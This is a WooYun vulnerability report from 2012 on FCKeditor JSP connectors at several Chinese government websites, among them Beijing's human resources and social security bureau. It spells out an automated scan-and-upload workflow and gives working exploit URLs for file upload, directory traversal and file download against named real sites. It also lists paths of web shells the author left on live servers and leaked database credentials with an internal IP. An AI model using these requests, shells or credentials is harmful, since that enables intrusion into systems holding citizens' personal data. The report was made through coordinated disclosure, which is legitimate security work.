当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09607

漏洞标题:北京社会保障局等政府网站多处安全严重安全漏洞

相关厂商:北京人力资源和社会保障局

漏洞作者: possible

提交时间:2012-07-13 17:08

修复时间:2012-08-27 17:08

公开时间:2012-08-27 17:08

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-13: 细节已通知厂商并且等待厂商处理中
2012-07-17: 厂商已经确认,细节仅向厂商公开
2012-07-27: 细节向核心白帽子及相关领域专家公开
2012-08-06: 细节向普通白帽子公开
2012-08-16: 细节向实习白帽子公开
2012-08-27: 细节向公众公开

简要描述:

多个政府站点使用的jsp版fck存在漏洞

详细说明:

jsp版FCK席卷一些小政府站点
一直做梦可以有这样一个工具,自动搜索漏洞,然后实现利用,然后提交乌云,然后自动刷rank。可惜呀,一直没有...
但是对于重复的问题,重复的漏洞,还是可以用工具来实现的...那样多省事,正所谓工具不是万能,但至少工具很省力
多个站点使用的fck编辑器存在漏洞
fck本身不用多说了,直接参考
WooYun: 中国联通某省站点任意文件上传
http://zone.wooyun.org/content/395
简单来说:使用有漏洞的jsp fck,攻击者可以不需要验证,直接上传任意文件,到任意目录(windows 是在站点本身分区)
这个漏洞扫描和利用都很简单,直接写个小脚本跑一跑就可以跑出很多....
大致过程:
1)获得jsp站点的域名列表(可以是从百度根据关键字抓取的,或者自己整理的)
2)对每个域名发送请求/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=file&CurrentFolder=/
3)正则匹配返回结果的<CurrentFolder path="/" url=",判断是否存在fck编辑器
4)如果存在fck直接使用post,上传一个shell
5)判断shell上传是否成功,输出shell路径...
通过这个小的脚本发现很多站点使用这个fck,因此,整理一下政府站点,拿感觉稍微有价值的,刷刷rank:
站点1:北京人力资源和社会保障局
fck: http://www.bjld.gov.cn/LDJAPP//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
shell:http://www.bjld.gov.cn/LDJAPP/UserFiles/Image/shell.jsp
简单分析:
没有仔细看代码,简单看一下,上面数据很多,站点很多
D:\bea815\user_projects\domains\mydomain\config.xml
而且数据库连接权限很大,很多sa
("jdbc:odbc:ldj","sa","cns");
jdbc1.url=jdbc:jtds:sqlserver://192.168.1.37:1433/middledata
jdbc1.username=sa
jdbc1.password=ldj
也许政府都是sa...
简单看一下 这个页面http://www.bjld.gov.cn/LDJAPP/tools/crm.jsp
很是无语,10几w的数据就这样显示出来?干啥用的?
目测这个内网有很多站点,如http://www.bjld.gov.cn/cardbiz 社会保障卡,不敢想想所有帝都人信息可能都在里面,
无论你在哪个公司,因为你都会发社会保障卡...
不敢进去看了,就到这了...
还有一个任意文件下载:
http://www.bjld.gov.cn/LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/web.xml&src=web.xml
站点2:福建省人口计生委公众网
本来不想说这个了,因为已经在http://zone.wooyun.org/content/395写了当时的测试过程,但是这个还是
很有代表性,而且站点漏洞不补怕担责任,还是提醒站点修复吧。毕竟上面还有防篡改设备,还是做的不错。利用FCK漏洞向任意目录上传,导致了防篡改设备失效。
FCK列目录功能:
http://www.fjjsw.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
查看当前目录下的所有文件和文件夹,并且FCK没有对CurrentFolder参数进行限制,导致../实现路径回退
两次回退到站点根目录:
http://www.fjjsw.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../
继续向上回溯发现,站点放到tomcat的默认目录下。而且仅对当前站点进行了防篡改保护。导致向其他目录上传
shell即可绕过防篡改软件。
本地提交:
http://www.fjjsw.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../../lybbs/
获得shell.
http://www.fjjsw.gov.cn/lybbs/shellnew.jsp
站点3:杭州大学生就业网
存在任意文件下载
http://www.zjhz.lss.gov.cn/lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/web.xml
找到fck位置:
http://www.zjhz.lss.gov.cn/lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
直接上传文件,但是发现上传后shell不能访问,程序对访问路径进行了判断,只要在允许的几个目录才可以访问,
从上面的下载漏洞可知,netweb/detail/目录下是可以访问没有限制的,因此直接利用FCK的跨目录上传即可,构造
上传请求:
http://www.zjhz.lss.gov.cn/lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../netweb/detail/
即可跨目录上传,获得shell路径
http://www.zjhz.lss.gov.cn/lemis/netweb/detail/shellnew.jsp
杭州劳动保障等站点在该域名下...
不一一说了问题都是一样的:
成都财政局会计网
http://www.cdkjw.org/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
佛山的虚拟主机,上面小站点挺多
http://www.fsyigong.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
广州天河人民法院
http://www.gzthfy.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
中国少儿基金
http://baoxian.cctf.org.cn//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
就写这些吧,好像还有,不知道放到哪里了...

漏洞证明:

http://www.bjld.gov.cn/LDJAPP/UserFiles/Image/shell.jsp 留个shell
其它证明如上 不截图了太麻烦了...

修复方案:

下载无漏洞版本的fck

版权声明:转载请注明来源 possible@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-07-17 16:40

厂商回复:

CNVD确认部分情况,其中一些站点漏洞因实时访问情况无法复现,目前已经协调以下单位进行处置:北京市信息化主管部门、CNCERT广东分中心、CNCERT福建分中心、CNCERT四川分中心。
后续一些站点视情况再行处置,fckeditor的虽算不上通用软件漏洞,但因配置不当造成的问题却很严重。
rank 15

最新状态:

暂无


漏洞评价:

评论

  1. 2012-07-13 17:10 | cncert国家互联网应急中心(乌云厂商)

    GOOD

  2. 2012-07-13 18:10 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @xsser 我还是觉得我原来的名字 好 呵呵

  3. 2012-07-14 12:39 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @possible 大礼包?

  4. 2012-07-14 15:53 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @horseluke 一个问题多个小站 就一起发了,不想刷屏了

  5. 2012-07-29 16:34 | freefinder ( 路人 | Rank:5 漏洞数:1 | 安全爱好者+漏洞新手)

    求细节啊。。。

  6. 2012-08-27 23:46 | DearLi ( 路人 | Rank:5 漏洞数:2 | 专注Web安全)

    @freefinder 还需要什么细节啊?你想了解什么内容。

  7. 2012-08-28 19:08 | freefinder ( 路人 | Rank:5 漏洞数:1 | 安全爱好者+漏洞新手)

    @DearLi 没想到是fckeditor,因为还有其他好多严重问题~~~,现在应该修复了

  8. 2012-08-28 21:25 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @freefinder 简要里面好像都已经写了 fck了....

  9. 2012-08-28 21:49 | freefinder ( 路人 | Rank:5 漏洞数:1 | 安全爱好者+漏洞新手)

    @possible 对其中的一个站比较关注,试的时候没找到路径...

  10. 2012-08-29 13:07 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @freefinder 额 也许被删了 呵呵

  11. 2012-11-26 14:48 | jjf012 ( 实习白帽子 | Rank:39 漏洞数:10 )

    虽说下载个新版本的就能修复。直接覆盖了事?